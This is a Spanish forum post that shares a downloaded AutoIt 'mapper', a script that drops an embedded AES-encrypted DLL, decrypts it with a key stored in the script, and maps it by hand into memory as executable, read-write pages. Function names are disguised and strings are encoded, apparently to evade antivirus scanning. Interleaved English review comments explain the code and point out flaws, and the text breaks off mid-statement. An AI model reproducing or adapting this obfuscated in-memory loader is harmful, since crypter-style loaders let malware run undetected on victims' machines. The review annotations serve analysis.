
 #493180  por SanGetsu18
 04 Ene 2018, 17:32
Estuve buscando información al respecto y me encontré por la red un mapper simplón; es este:
#NoTrayIcon  
#include <WinAPI.au3>
#include <Memory.au3>
#include <Crypt.au3>

; Alias table.  Every global below holds the *name* of a built-in or UDF
; function as a bare word; AutoIt allows calling a function through such a
; variable ($alias(args)), and that is how the rest of the script invokes
; DllStructCreate, DllCall, VirtualProtect, FIXIMPORTS and friends.  The
; meaningless random names, together with the STRINGDEC-encoded strings used
; at the call sites, are obfuscation (presumably aimed at keyword-based static
; scanning).  Many aliases repeat the same target (DLLSTRUCTCREATE,
; DLLSTRUCTGETDATA and SETERROR appear many times) and a number of them are
; not referenced anywhere in the visible code.  To review a call site,
; substitute the target named here for the alias.
$ROOTKERNELADMINISTRATIONROOT=BINDLL
$ROOTADMINISTRATIONROOTEXPLOITKERNEL=_CRYPT_STARTUP
$BYPASSKERNELEXPLOITEXPLOITBYPASS=BINARYTOSTRING
$EXPLOITEXPLOITBYPASSHOOK=_CRYPT_DECRYPTDATA
$KERNELKERNELADMINISTRATIONROOTHOOK=DLLFROMMEMORY
$ADMINISTRATIONBYPASSROOTKERNELBYPASSEXPLOIT=DLLCLOSE
$KERNELROOTEXPLOITEXPLOITADMINISTRATION=FILEOPEN
$EXPLOITADMINISTRATIONBYPASSHOOK=FILEREAD
$ADMINISTRATIONADMINISTRATIONEXPLOITKERNEL=FILECLOSE
$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION=DLLSTRUCTCREATE
$ROOTADMINISTRATIONHOOKKERNELBYPASSEXPLOIT=BINARYLEN
$ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION=DLLSTRUCTSETDATA
$HOOKROOTKERNELROOTHOOK=DLLSTRUCTGETPTR
$BYPASSEXPLOITHOOKEXPLOIT=DLLSTRUCTCREATE
$KERNELBYPASSROOTADMINISTRATION=DLLSTRUCTGETDATA
$HOOKHOOKADMINISTRATIONHOOK=DLLSTRUCTGETDATA
$ROOTKERNELHOOKHOOKBYPASSROOT=SETERROR
$ADMINISTRATIONADMINISTRATIONADMINISTRATIONROOTEXPLOIT=DLLSTRUCTCREATE
$HOOKBYPASSADMINISTRATIONHOOKKERNEL=DLLSTRUCTGETDATA
$HOOKROOTBYPASSROOTROOTADMINISTRATION=SETERROR
$ADMINISTRATIONROOTEXPLOITHOOKROOTBYPASS=DLLSTRUCTCREATE
$HOOKHOOKROOTKERNEL=DLLSTRUCTGETDATA
$ADMINISTRATIONBYPASSROOTEXPLOIT=DLLSTRUCTCREATE
$EXPLOITADMINISTRATIONROOTADMINISTRATIONKERNEL=DLLSTRUCTGETDATA
$KERNELADMINISTRATIONADMINISTRATIONHOOK=SETERROR
$HOOKROOTKERNELROOT=DLLSTRUCTCREATE
$ROOTROOTBYPASSROOT=SETERROR
$KERNELKERNELKERNELROOTBYPASS=DLLSTRUCTCREATE
$ROOTADMINISTRATIONEXPLOITBYPASSKERNELHOOK=SETERROR
$EXPLOITADMINISTRATIONHOOKBYPASS=DLLSTRUCTGETDATA
$EXPLOITHOOKEXPLOITKERNELADMINISTRATIONROOT=DLLSTRUCTGETDATA
$KERNELROOTBYPASSKERNEL=DLLSTRUCTGETDATA
$EXPLOITROOTBYPASSADMINISTRATION=DLLSTRUCTCREATE
$ADMINISTRATIONBYPASSROOTROOTADMINISTRATIONADMINISTRATION=DLLSTRUCTGETDATA
$BYPASSBYPASSKERNELEXPLOITADMINISTRATION=DLLSTRUCTGETDATA
$EXPLOITHOOKEXPLOITROOTHOOK=DLLSTRUCTCREATE
$EXPLOITROOTKERNELADMINISTRATIONROOTHOOK=DLLSTRUCTGETDATA
$ROOTROOTBYPASSADMINISTRATION=DLLSTRUCTGETDATA
$HOOKEXPLOITKERNELBYPASSROOTEXPLOIT=UNMAPVIEWOFSECTION
$BYPASSKERNELROOTADMINISTRATION=_MEMVIRTUALALLOC
$BYPASSEXPLOITROOTKERNEL=DLLSTRUCTGETPTR
$HOOKROOTADMINISTRATIONEXPLOITHOOK=DLLSTRUCTGETDATA
$BYPASSADMINISTRATIONEXPLOITBYPASS=VIRTUALPROTECT
$KERNELROOTROOTKERNELKERNEL=_WINAPI_FREELIBRARY
$HOOKHOOKBYPASSKERNELHOOKROOT=SETERROR
$ROOTROOTEXPLOITBYPASS=DLLSTRUCTSETDATA
$HOOKHOOKEXPLOITROOTEXPLOITKERNEL=DLLSTRUCTCREATE
$HOOKADMINISTRATIONBYPASSEXPLOITKERNEL=DLLSTRUCTGETDATA
$BYPASSBYPASSADMINISTRATIONBYPASS=DLLSTRUCTCREATE
$HOOKROOTADMINISTRATIONHOOKKERNEL=DLLSTRUCTCREATE
$KERNELBYPASSEXPLOITBYPASS=DLLSTRUCTGETDATA
$EXPLOITROOTKERNELADMINISTRATIONHOOK=DLLSTRUCTGETDATA
$ADMINISTRATIONROOTADMINISTRATIONKERNEL=DLLSTRUCTGETDATA
$HOOKADMINISTRATIONEXPLOITBYPASSROOT=DLLSTRUCTGETDATA
$BYPASSADMINISTRATIONADMINISTRATIONADMINISTRATION=VIRTUALPROTECT
$BYPASSHOOKBYPASSBYPASSROOTKERNEL=DLLSTRUCTSETDATA
$HOOKEXPLOITKERNELBYPASSADMINISTRATION=DLLSTRUCTCREATE
$ADMINISTRATIONEXPLOITKERNELHOOKBYPASSBYPASS=DLLSTRUCTGETDATA
$BYPASSBYPASSHOOKHOOKKERNELADMINISTRATION=DLLSTRUCTCREATE
$HOOKHOOKADMINISTRATIONEXPLOITHOOK=DLLSTRUCTSETDATA
$BYPASSEXPLOITKERNELROOT=DLLSTRUCTCREATE
$BYPASSEXPLOITBYPASSROOTBYPASS=DLLSTRUCTGETDATA
$ROOTEXPLOITHOOKADMINISTRATIONBYPASSHOOK=DLLSTRUCTCREATE
$ADMINISTRATIONADMINISTRATIONKERNELADMINISTRATIONKERNELHOOK=DLLSTRUCTCREATE
$BYPASSKERNELEXPLOITKERNEL=FIXIMPORTS
$ADMINISTRATIONEXPLOITEXPLOITADMINISTRATIONHOOK=DLLSTRUCTCREATE
$ADMINISTRATIONKERNELBYPASSROOTROOTADMINISTRATION=FIXRELOC
$ADMINISTRATIONADMINISTRATIONBYPASSHOOK=DLLCALLADDRESS
$KERNELEXPLOITADMINISTRATIONROOTBYPASSADMINISTRATION=_WINAPI_FREELIBRARY
$KERNELROOTKERNELHOOKKERNELROOT=DLLSTRUCTGETSIZE
$ROOTADMINISTRATIONROOTBYPASSEXPLOIT=DLLSTRUCTGETPTR
$EXPLOITKERNELBYPASSKERNELHOOK=DLLSTRUCTCREATE
$ADMINISTRATIONKERNELBYPASSKERNEL=DLLSTRUCTGETDATA
$KERNELADMINISTRATIONEXPLOITROOTEXPLOITADMINISTRATION=DLLSTRUCTGETDATA
$EXPLOITHOOKKERNELADMINISTRATIONEXPLOITADMINISTRATION=DLLSTRUCTCREATE
$EXPLOITROOTROOTADMINISTRATIONEXPLOIT=DLLSTRUCTGETPTR
$ADMINISTRATIONHOOKROOTROOT=DLLSTRUCTGETDATA
$ROOTBYPASSADMINISTRATIONADMINISTRATION=BITSHIFT
$EXPLOITEXPLOITKERNELROOTHOOK=DLLSTRUCTCREATE
$BYPASSBYPASSHOOKEXPLOIT=BITAND
$KERNELEXPLOITHOOKEXPLOITADMINISTRATIONHOOK=DLLSTRUCTSETDATA
$BYPASSHOOKHOOKROOTADMINISTRATIONROOT=DLLSTRUCTGETDATA
$EXPLOITBYPASSADMINISTRATIONROOTADMINISTRATIONEXPLOIT=DLLSTRUCTGETPTR
$BYPASSBYPASSEXPLOITBYPASS=DLLSTRUCTGETSIZE
$BYPASSBYPASSADMINISTRATIONKERNELKERNEL=DLLSTRUCTCREATE
$HOOKEXPLOITHOOKBYPASSKERNEL=DLLSTRUCTCREATE
$HOOKHOOKBYPASSROOTKERNEL=DLLSTRUCTGETDATA
$ROOTEXPLOITKERNELEXPLOIT=DLLSTRUCTGETDATA
$KERNELHOOKROOTBYPASSADMINISTRATION=DLLSTRUCTCREATE
$ROOTKERNELROOTROOTADMINISTRATIONBYPASS=_WINAPI_STRINGLENA
$BYPASSKERNELKERNELBYPASSHOOKADMINISTRATION=DLLSTRUCTGETDATA
$BYPASSEXPLOITEXPLOITROOTEXPLOITBYPASS=_WINAPI_LOADLIBRARY
$KERNELHOOKHOOKADMINISTRATION=DLLSTRUCTGETDATA
$ADMINISTRATIONKERNELBYPASSROOTADMINISTRATIONEXPLOIT=DLLSTRUCTGETDATA
$ROOTKERNELEXPLOITHOOKROOT=DLLSTRUCTGETDATA
$HOOKKERNELHOOKHOOKEXPLOIT=DLLSTRUCTCREATE
$KERNELBYPASSBYPASSHOOKROOT=DLLSTRUCTGETDATA
$HOOKKERNELROOTKERNELEXPLOIT=BITSHIFT
$KERNELEXPLOITADMINISTRATIONROOTROOT=BINARYMID
$BYPASSHOOKADMINISTRATIONHOOKBYPASSKERNEL=GETPROCADDRESS
$KERNELKERNELKERNELROOTHOOKEXPLOIT=BITAND
$EXPLOITADMINISTRATIONADMINISTRATIONADMINISTRATION=DLLSTRUCTCREATE
$ADMINISTRATIONADMINISTRATIONROOTEXPLOIT=_WINAPI_STRINGLENA
$KERNELADMINISTRATIONEXPLOITKERNEL=DLLSTRUCTGETDATA
$BYPASSBYPASSADMINISTRATIONADMINISTRATION=GETPROCADDRESS
$HOOKBYPASSHOOKBYPASSBYPASS=DLLSTRUCTSETDATA
$KERNELHOOKKERNELHOOK=DLLSTRUCTCREATE
$ADMINISTRATIONROOTEXPLOITHOOKADMINISTRATIONHOOK=DLLCALL
$BYPASSHOOKHOOKHOOKKERNELHOOK=_WINAPI_GETCURRENTPROCESS
$EXPLOITROOTROOTBYPASSKERNELHOOK=SETERROR
$HOOKEXPLOITEXPLOITEXPLOITKERNELKERNEL=DLLCALL
$EXPLOITADMINISTRATIONBYPASSROOT=SETERROR
$EXPLOITEXPLOITKERNELHOOKKERNELBYPASS=ISNUMBER
$BYPASSKERNELBYPASSBYPASS=DLLCALL
$ADMINISTRATIONROOTEXPLOITBYPASSROOTKERNEL=SETERROR

; Script entry point: drop, decrypt and manually map the embedded DLL.
; FileInstall extracts the DLL compiled into the script to @TempDir (flag 1 =
; overwrite an existing file).  NOTE(review): the dropped file is never
; deleted, so the encrypted payload stays on disk after the script exits.
FILEINSTALL("HelloWorld.dll",@TEMPDIR&"/HelloWorld.dll",1)
; Read the dropped file back as a Binary value (BINDLL).
$FILE=$ROOTKERNELADMINISTRATIONROOT(@TEMPDIR&"/HelloWorld.dll")
; _Crypt_Startup; no matching _Crypt_Shutdown call is visible in this script.
$ROOTADMINISTRATIONROOTEXPLOITKERNEL()
; _Crypt_DecryptData with AES-256 ($CALG_AES_256) and a STRINGDEC-encoded key
; that is embedded in the script itself, followed by BinaryToString.  Because
; the key ships with the binary, the payload is recoverable by anyone holding
; the compiled script.
$TEMP_DECRYPTED=$BYPASSKERNELEXPLOITEXPLOITBYPASS($EXPLOITEXPLOITBYPASSHOOK($FILE,STRINGDEC("usjrahxtezaapqoxpojhugijiagzyf","-15,-9,5,4,7,16,-9,4,3,-15,23,21,3,1,0,-10,-2,-1,7,14,-11,9,9,6,-1,19,13,-23,-23,14"),$CALG_AES_256))
; DLLFROMMEMORY maps the decrypted image into this process (see that function).
; NOTE(review): DLLFROMMEMORY has no RETURN statement, so $HDLL does not
; receive the mapped base address and the DllClose below has no real handle
; to act on.
GLOBAL $HDLL=$KERNELKERNELADMINISTRATIONROOTHOOK($TEMP_DECRYPTED)
$ADMINISTRATIONBYPASSROOTKERNELBYPASSEXPLOIT($HDLL)
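; Reads $SFILE in binary mode (FileOpen flag 16) and returns its contents as
; a Binary value.
; Returns "" with @error = 1 when the file cannot be opened.  The original
; passed FileOpen's -1 failure value straight into FileRead/FileClose, which
; silently produced an empty result without signalling the failure.
FUNC BINDLL($SFILE)
LOCAL $HFILE=$KERNELROOTEXPLOITEXPLOITADMINISTRATION($SFILE,16)
IF $HFILE=-1 THEN RETURN SETERROR(1,0,"")
LOCAL $BBINARY=$EXPLOITADMINISTRATIONBYPASSHOOK($HFILE)
; Close before returning so the handle is not leaked if the caller ignores the result.
$ADMINISTRATIONADMINISTRATIONEXPLOITKERNEL($HFILE)
RETURN $BBINARY
ENDFUNC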
; Manually maps a PE image held in memory ($BBINARYIMAGE) into the current
; process: parses the DOS/NT/file/optional headers, allocates a fresh region,
; copies headers and sections, resolves imports, applies base relocations and
; finally calls the image entry point.  All Win32 calls go through the alias
; globals at the top of the script and every struct definition string is
; obfuscated with STRINGDEC, so the field meanings noted below are inferred
; from the variable names and constants, not from decoded strings.
;
; Reviewer notes:
;  - The image is never registered with the Windows loader (no LoadLibrary is
;    performed for it) and every section is set PAGE_EXECUTE_READWRITE.  A
;    private RWX region that starts with a copy of the PE headers (see the
;    header copy below) is the usual memory-scanning handle for this pattern.
;  - The function has no RETURN statement, so callers do not receive the
;    mapped base address.
;  - @error codes: 1 = missing "MZ", 2 = missing "PE" signature,
;    3 = unsupported or mismatched optional-header magic, 6 = protection
;    change on the headers failed.
FUNC DLLFROMMEMORY($BBINARYIMAGE)
; Copy the image into a struct (definition "<obfuscated>" & BinaryLen & "]",
; presumably a byte array) and keep a raw pointer to it for header parsing.
LOCAL $TBINARY=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$ROOTADMINISTRATIONHOOKKERNELBYPASSEXPLOIT($BBINARYIMAGE)&"]")
$ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($TBINARY,1,$BBINARYIMAGE)
LOCAL $PPOINTER=$HOOKROOTKERNELROOTHOOK($TBINARY)
; IMAGE_DOS_HEADER laid over the start of the image (obfuscated field list).
LOCAL $TIMAGE_DOS_HEADER=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("cafcpiykeudtenowwkcwacdibognfe","0,7,-5,15,-80,-28,-24,-4,4,-18,-9,-66,-8,-51")&STRINGDEC("ubkwizcimjccdlngsyozqnmibctpmy","2,13,7,-19,-73,-56,22,11,-8,9,-20,11,-24,-11,5,13,-35,-24,-8,-21,-54")&STRINGDEC("jkmnqgfdegisgbolkjuviexnjchhmj","13,4,5,-10,-81,-23,-5,3,0,12,-46")&STRINGDEC("juwfbhmxssmocpwtpbcobugkqfdcsx","13,-6,-5,-2,-66,-22,-8,-12,-4,-16,-12,5,6,-1,-9,-1,-53")&STRINGDEC("ororjsbobfeuexuctebiilpjrlwbzr","8,-3,3,-14,-74,-32,7,11,3,9,1,-45,0,-23,-17,2,-2,-42")&STRINGDEC("yukurzknzqmfrnbgfeknadgrlcswyd","-2,-6,7,-17,-82,-45,-2,0,-17,-4,8,7,-45,10,18,11,-5,-42")&STRINGDEC("hcitseforjnbwwlesemwhzsnsofyji","15,12,9,-16,-83,-24,-5,9,-9,3,7,11,-50,1,8,13,-18,-42")&STRINGDEC("pcmexevhoapcnowlhnqvbmfdgzwdtb","7,12,5,-1,-88,-18,-35,-45")&STRINGDEC("nfvqivdzbivpwjjjsfyhgurvhktyga","9,9,-4,-13,-73,-35,-20,-63")&STRINGDEC("iqydohopzirvzgokzikhdtrfrtinsr","14,-2,-7,0,-79,-37,-7,-11,-23,2,1,-1,-13,-44")&STRINGDEC("bbhshyiatjhkveqyxbnxvwhjxektqt","21,13,10,-15,-72,-48,-25,-38")&STRINGDEC("woomgigoagyltoukvhgfvckhehksjr","0,0,3,-9,-71,-38,-20,-52")&STRINGDEC("knlkwzunftsaagncrdvuhpvaxdquzx","12,1,6,-7,-87,-40,-16,-2,9,-17,-18,19,8,8,0,-40")&STRINGDEC("wtdvwapqykauuhxanlidtihynoqjfc","0,-5,14,-18,-87,-18,6,-12,-7,1,0,4,-58")&STRINGDEC("jblctkcwzafjjioqysnjrwngwtnmrd","-7,6,-11,15,-84,-25,2,-4,-21,17,16,-5,-6,-14,-55,-20,-62")&STRINGDEC("wpaoqzttzejeftoafhonsuzlhxurjq","0,-1,17,-11,-81,-43,-47,-39,-49,-1,-5,9,14,-11,-9,8,-1,10,-52")&STRINGDEC("bpsytbsqlyrrlgxuaqcfzgtdtdaygh","21,-1,-1,-21,-84,-19,-46,-36,-35,-11,-12,-3,6,6,-23,-1,8,-2,11,-43")&STRINGDEC("ueqmamdbvlcyewgqnzlmsxoomyrhzj","-18,3,-16,5,-65,-27,1,17,-17,6,19,-20,-1,-69,-12,-63,-62,-29,-49")&STRINGDEC("ynlokakmzhypfrkhblsjjpqbrtbhzm","-21,9,3,3,-7,-65,-42,-9,-22,10,-20,3,13,-35,-5,-26,3,11,-46,14,-5,-40,-12,-1,-14,-15,16"),$PPOINTER)
; Advance to the NT headers by the field read here (presumably e_lfanew).
$PPOINTER+=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DOS_HEADER,STRINGDEC("dxokaffwazvbipoiudpyjghgnmrmtj","-35,-20,-11,7,4,13,13,-40,5,-44,-17,21,-36,8,-10,-33,-16,-3,-12,-20,8"))
; DOS signature check; error 1 when "MZ" is missing.
LOCAL $SMAGIC=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DOS_HEADER,STRINGDEC("rijddzsrdudkbminhfxzclaedyujxh","-37,-8,-3,5,-1"))
IF NOT ($SMAGIC=="MZ")THEN
RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(1,0,0)
ENDIF
; NT signature (4 bytes): 17744 = 0x00004550 = "PE\0\0" read as a
; little-endian DWORD; error 2 otherwise.
LOCAL $TIMAGE_NT_SIGNATURE=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("vvxgrorfaveuzywnnofucsdksnzxpi","-18,1,-9,11,-14,-79,-31,3,6,-8,-4,-1,-5,-7,-18"),$PPOINTER)
$PPOINTER+=4
IF $KERNELBYPASSROOTADMINISTRATION($TIMAGE_NT_SIGNATURE,STRINGDEC("hfvlslrfzlxtfvheabssvtkdrwjdvd","-21,3,-15,2,-18,8,3,12,-21"))<>17744 THEN
RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(2,0,0)
ENDIF
; IMAGE_FILE_HEADER (20 bytes); only NumberOfSections is used afterwards.
LOCAL $TIMAGE_FILE_HEADER=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("retwkmufmhmqqqdufngfgdcsnpuhur","5,10,-2,-19,-75,-32,-20,-3,-5,1,1,-12,-54")&STRINGDEC("jkyhbzkqgtbnrbyvhdlfukgrzrptzq","13,4,-7,-4,-66,-44,10,-4,-5,-15,16,-31,-12,-15,-20,-19,12,5,3,8,-2,-48")&STRINGDEC("fgdaygtgtzkeiogftjplkmhulfitfm","-2,16,11,17,-21,-71,-32,2,-7,-21,-39,-4,11,-10,-20,14,-19,3,0,-49")&STRINGDEC("zopsbydhesjliykcpzsrvtfauhflxz","-22,8,-1,-1,2,-89,-20,7,4,-5,10,-7,9,-37,4,-16,9,-13,-17,-3,-10,-32,-5,1,-9,-3,-43")&STRINGDEC("flefcfumutnglnuaesxlfacuwsbvwu","-2,11,10,12,1,-70,-39,8,-8,-18,-9,11,-29,-8,-34,24,8,-17,-9,0,13,-38")&STRINGDEC("sirkouutovjrulplwkbwilyyfdsrvn","4,6,0,-7,-79,-34,-12,6,-10,-39,-4,-35,-5,8,-7,3,-9,-10,10,-47,-4,-11,-21,-20,12,-41")&STRINGDEC("bbvlnjrojihsqathczonmpdpebdxvt","21,13,-4,-8,-78,-39,-10,-14,8,-8,-5,1,-12,17,-11,11,17,-17,-12,5"),$PPOINTER)
LOCAL $INUMBEROFSECTIONS=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_FILE_HEADER,STRINGDEC("gqpiikbiiqmkisxanzdkqymhrqxvgn","-25,4,-3,-7,-4,7,-19,-3,-22,-12,-10,9,0,-4,-10,18"))
$PPOINTER+=20
; Optional-header Magic: 267 = 0x10B (PE32), 523 = 0x20B (PE32+).  The image
; bitness has to match the running interpreter (@AutoItX64); error 3 if not.
LOCAL $TMAGIC=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("ltdxfwynlbjsvdanyihkuqwdrviztg","11,-5,14,-20,-70,-42,-24,-7,-3,1,-47"),$PPOINTER)
LOCAL $IMAGIC=$KERNELBYPASSROOTADMINISTRATION($TMAGIC,1)
LOCAL $TIMAGE_OPTIONAL_HEADER
IF $IMAGIC=267 THEN
IF @AUTOITX64 THEN RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(3,0,0)
; NOTE(review): the statement below is published with one string literal
; broken across two lines ("...sdain" / "m",...).  That looks like a forum
; line-wrap artefact and would not compile as shown.
$TIMAGE_OPTIONAL_HEADER=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("ltdxfwynlbjsvdanyihkuqwdrviztg","11,-5,14,-20,-70,-42,-24,-7,-3,1,-47")&STRINGDEC("phtmbpkyvjtldmaevyoqfpsajvfkyr","-14,17,0,-8,-66,-35,-10,-15,-7,8,-40,-3,10,-2,4,13,-32,-20,3,2,3,-1,-5,-38")&STRINGDEC("pfrvamtwlzvahdajmnfnixukxqvjcn","-14,19,2,-17,-65,-32,-11,-9,3,-8,-42,8,6,7,4,8,-23,-9,12,5,0,-9,-7,-48")&STRINGDEC("zznqemumdcjfgbjqcxcfzdkzjgzraf","-22,-3,1,1,-1,-77,-34,-4,22,2,-27,0,-36,13,-6,-12,-40")&STRINGDEC("tgdxlnriionmhcmirelnaeboiclffe","-16,16,11,-6,-8,-78,-31,0,17,-10,-31,-7,-31,11,-4,11,-9,-4,0,-5,25,0,2,-43,-8,17,-11,-43")&STRINGDEC("anejkuipptdxyzpklmpuxkhkxqwuub","3,9,10,8,-7,-85,-22,-7,10,-15,-21,-18,-36,-12,-7,3,-3,7,-7,-20,-12,-2,18,-6,-20,-45,-22,-1,-20,-39")&STRINGDEC("cyotrfodsvhtzmzgavlxjcmpzjmpnq","1,-2,0,-2,-14,-70,-46,0,-15,-4,-3,-1,-7,-30,-20,-34,13,-2,6,1,-26,12,-4,-2,-6,-47")&STRINGDEC("ieqdjchuvhvquaxaaxfeicstnprmjy","-5,18,-2,14,-6,-67,-38,-20,-3,-3,-39,-11,-50,14,-20,4,-38")&STRINGDEC("rmoxhaieftsimilitgwvknhwnxxixz","-14,10,0,-6,-4,-65,-39,-4,13,-15,-36,-3,-41,-8,8,-8,-57")&STRINGDEC("ehjyoiekhvhjqdhnshxigdwplgzdbw","-1,15,5,-7,-11,-73,-28,2,-7,-15,-3,-40,-16,15,-3,-51")&STRINGDEC("exminvanugqcpyvxhdxhfyewdnjudn","-1,-1,2,9,-10,-86,-14,-9,-18,13,-8,12,-2,-56,-10,-15,-1,10,-11,-3,8,-5,-42")&STRINGDEC("ikovgnghvtwulshxaacxinhwmhwwhi","-5,12,0,-4,-3,-78,-33,1,-10,-15,-54,-9,-3,-12,6,-11,4,13,17,-61")&STRINGDEC("pkeodrwintgxsleputwcfakyqdjigk","7,4,13,-11,-68,-37,-22,1,1,-2,-24,-8,-14,6,-4,4,-12,-6,-16,-16,19,18,9,-20,-4,-14,-5,9,12,-2,-1,3,-42")&STRINGDEC("rsgizxjiqxfvzvpjysgpvumwnmxvgg","5,-4,11,-5,-90,-43,-1,5,-2,-6,-23,-6,-21,-4,-15,10,-16,-5,0,-29,3,-2,7,-18,-1,-23,-19,-4,12,2,-3,-5,-44")&STRINGDEC("ijyobiktanvrjgmgdsyofhppgikybt","14,5,-7,-11,-66,-28,-10,-10,14,4,-45,-5,-9,0,-8,-17,1,-1,-6,-6,9,6,-53")&STRINGDEC("whlayssemmndzorobazycfqwpgbnpx","0,7,6,3,-89,-38,-10,9,2,5,-37,9,-25,-8,-13,-25,3,17,-7,-16,12,8,-54")&STRINGDEC("uldpgdgovwxumqmmaaqgqyrwsdain
m","2,3,14,-12,-71,-23,-6,-5,-7,-5,-37,0,-11,2,12,6,19,4,-4,-17,-12,-7,1,-14,-4,10,-38")&STRINGDEC("hfnduqnrlbroybqslnaqoogukwuauv","15,9,4,0,-85,-36,-5,-4,3,16,-31,6,-23,17,8,0,8,-9,12,-27,-10,3,12,-12,4,-9,-58")&STRINGDEC("nqpaymclyzlckbvmscnwxywpjhkamg","-10,6,-1,17,-21,-77,-12,-3,-11,-71,-58,-13,-6,16,-3,-4,-4,11,-24,-22,-12,-4,-18,-53")&STRINGDEC("faxgbzxuuvjkpasfhvbxxknkonfdel","-2,22,-9,11,2,-90,-37,-12,5,-17,-27,-5,-39,12,-18,1,-3,-59")&STRINGDEC("gnobcrxmwoyuussmjbbpxzefcjmlve","-3,9,0,16,1,-82,-37,-4,3,-10,-42,-15,-45,-14,-18,-9,-5,16,17,-53")&STRINGDEC("ieyxrrajxyexgteibukaitgbzhpdkv","-5,18,-10,-6,-14,-82,-30,-2,-19,-22,6,-37,14,-7,-42")&STRINGDEC("cdjqrrkrxphgwfhemgenaxowhhhhmw","20,11,8,-13,-82,-31,10,-16,-5,9,11,13,-18,7,-45")&STRINGDEC("haihznoatxwzjhtxfddiskisnhgxyj","15,14,9,-4,-90,-42,-3,11,-49,-16,-22,-8,-9,-5,0,-19,12,5,15,11,-10,-8,10,-56")&STRINGDEC("hvwuctdpudbiwukfefxlukkajrxhml","-4,1,-8,-3,1,-84,-17,-7,5,1,-19,-3,-36,-1,-10,-3,6,-20,-19,7,-16,7,11,4,-47")&STRINGDEC("xpyocpucykwklmcgpnjfxxvgxrqzvn","-20,7,-10,3,1,-80,-34,6,1,-6,-40,-5,-25,7,-2,-4,-5,-43,5,7,-11,-15,-2,-44")&STRINGDEC("itqjjtiqkyprnswzkdzxizyyvyflwz","-5,3,-2,8,-6,-84,-22,-8,15,-20,-33,-12,-38,-14,-22,-10,-25,1,-7,-19,9,-4,-20,-62")&STRINGDEC("wcpvnygzkdwoiefiynhkyiymolexfb","-19,20,-1,-4,-10,-89,-20,-17,15,1,-40,-9,-33,0,-5,7,-54,1,5,2,-16,11,-62")&STRINGDEC("sxefhvsraekvuxabluizrsvvnrtxgg","-15,-1,10,12,-4,-86,-39,-3,0,-1,-6,-4,-47,-12,0,5,7,-58")&STRINGDEC("otffztxddrgbujlpiyxifduzuypdjq","-11,3,9,12,-22,-84,-42,17,9,-16,-2,16,-38,-4,-26,6,-8,-56,-10,-5,-19,5,5,-21,-2"),$PPOINTER)
; 96 = size of the PE32 optional header up to (not including) the data directories.
$PPOINTER+=96
ELSEIF $IMAGIC=523 THEN
IF NOT @AUTOITX64 THEN RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(3,0,0)
; NOTE(review): same line-wrap artefact as above; the statement continues on
; the next line after "STRINGDEC(".
$TIMAGE_OPTIONAL_HEADER=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("ltdxfwynlbjsvdanyihkuqwdrviztg","11,-5,14,-20,-70,-42,-24,-7,-3,1,-47")&STRINGDEC("phtmbpkyvjtldmaevyoqfpsajvfkyr","-14,17,0,-8,-66,-35,-10,-15,-7,8,-40,-3,10,-2,4,13,-32,-20,3,2,3,-1,-5,-38")&STRINGDEC("pfrvamtwlzvahdajmnfnixukxqvjcn","-14,19,2,-17,-65,-32,-11,-9,3,-8,-42,8,6,7,4,8,-23,-9,12,5,0,-9,-7,-48")&STRINGDEC("zznqemumdcjfgbjqcxcfzdkzjgzraf","-22,-3,1,1,-1,-77,-34,-4,22,2,-27,0,-36,13,-6,-12,-40")&STRINGDEC("tgdxlnriionmhcmirelnaeboiclffe","-16,16,11,-6,-8,-78,-31,0,17,-10,-31,-7,-31,11,-4,11,-9,-4,0,-5,25,0,2,-43,-8,17,-11,-43")&STRINGDEC("anejkuipptdxyzpklmpuxkhkxqwuub","3,9,10,8,-7,-85,-22,-7,10,-15,-21,-18,-36,-12,-7,3,-3,7,-7,-20,-12,-2,18,-6,-20,-45,-22,-1,-20,-39")&STRINGDEC("cyotrfodsvhtzmzgavlxjcmpzjmpnq","1,-2,0,-2,-14,-70,-46,0,-15,-4,-3,-1,-7,-30,-20,-34,13,-2,6,1,-26,12,-4,-2,-6,-47")&STRINGDEC("ieqdjchuvhvquaxaaxfeicstnprmjy","-5,18,-2,14,-6,-67,-38,-20,-3,-3,-39,-11,-50,14,-20,4,-38")&STRINGDEC("lrbrvkwljjlvqewtjweaygvboxavrf","9,-9,12,2,-64,-55,-87,-35,3,-9,-5,-17,-47,-4,-4,-15,-47")&STRINGDEC("exminvanugqcpyvxhdxhfyewdnjudn","-1,-1,2,9,-10,-86,-14,-9,-18,13,-8,12,-2,-56,-10,-15,-1,10,-11,-3,8,-5,-42")&STRINGDEC("ikovgnghvtwulshxaacxinhwmhwwhi","-5,12,0,-4,-3,-78,-33,1,-10,-15,-54,-9,-3,-12,6,-11,4,13,17,-61")&STRINGDEC("pkeodrwintgxsleputwcfakyqdjigk","7,4,13,-11,-68,-37,-22,1,1,-2,-24,-8,-14,6,-4,4,-12,-6,-16,-16,19,18,9,-20,-4,-14,-5,9,12,-2,-1,3,-42")&STRINGDEC("rsgizxjiqxfvzvpjysgpvumwnmxvgg","5,-4,11,-5,-90,-43,-1,5,-2,-6,-23,-6,-21,-4,-15,10,-16,-5,0,-29,3,-2,7,-18,-1,-23,-19,-4,12,2,-3,-5,-44")&STRINGDEC("ijyobiktanvrjgmgdsyofhppgikybt","14,5,-7,-11,-66,-28,-10,-10,14,4,-45,-5,-9,0,-8,-17,1,-1,-6,-6,9,6,-53")&STRINGDEC("whlayssemmndzorobazycfqwpgbnpx","0,7,6,3,-89,-38,-10,9,2,5,-37,9,-25,-8,-13,-25,3,17,-7,-16,12,8,-54")&STRINGDEC("uldpgdgovwxumqmmaaqgqyrwsdainm","2,3,14,-